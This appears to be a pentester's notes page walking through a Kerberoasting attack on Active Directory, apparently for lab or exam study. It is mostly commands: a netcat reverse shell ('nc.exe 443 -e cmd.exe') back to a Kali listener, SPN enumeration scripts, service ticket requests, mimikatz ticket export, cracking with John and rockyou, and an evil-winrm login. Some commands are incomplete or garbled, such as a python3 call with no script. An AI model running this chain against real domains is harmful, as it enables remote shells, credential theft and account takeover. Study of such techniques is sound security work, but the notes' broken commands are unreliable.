Service Account Attacks (Example Path)

  1. Make sure you have the stable shell. This is to ensure we can run the mimikatz on the machine.

Transfer nc.file and execute the following & have the nc listening on kali.

PS C:\Windows\Temp> C:\Windows\Temp\nc.exe 443 -e cmd.exe (powershell.exe)
C:\Inetpub\Scripts\nc.exe 443 -e cmd.exe 

2. Go through the enumeration methods and see if there's any service accounts.

  • A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.

  • Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.

  • Query the Domain Controller in search of SPNs.

  • SPN Examples

    • CIFS/MYCOMPUTER$ - file share access.

    • LDAP/MYCOMPUTER$ - querying AD info via. LDAP.

    • HTTP/MYCOMPUTER$ - Web services such as IIS.


  • Perform nslookup of the service hostname -> see if there is an entrypoint here.

  • Automated SPN enum scripts:

# Kerberoast:
PS> .\GetUserSPNs.ps1

# Powershell Empire:
PS> .\Get-SPN.ps1

Take notes of this account name you found!

3. Transfer mimikatz.exe to the host and run it. (sometimes, mimikatz version may matter - try 2.2.0 if one doesn't work)

3.Use the SPN to dump the kerberos tickets

  • If we know the serviceprincipalname value from prior AD enum, we can target the SPN by by requesting a service ticket for it from the Domain Controller and access resources from the service with our own ticket.

# request service ticket
PS> Add-Type -AssemblyName System.IdentityModel
PS> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '[service_principal_name]'

# export cached tickets
mimikatz > kerberos::list /export

It's important to take notes of the "SAMAccountName" which we will use as a username at the next stage when we try to login to the account via evil-winrm.

Crack SPN hashes

# Kerberoast
$ python3 rockyou.txt [ticket.kirbi]  # locally crack hashes
PS> Invoke-Kerberoast.ps1                            # crack hashes on target

# John the Ripper
move the ticket to the master directory where the scripts live (mv /home/kali/transfer/AD/ticket.kirbi /home/kali/transfer/Downloads/kerberoast-master/)
$ python3 -o johncrackfile ticket.kirbi  # convert ticket to john file
$ john --wordlist=rockyou.txt johncrackfile

After crack the hashes, you can run

./evil-winrm.rb -i -u sqlServer -p PASS

Last updated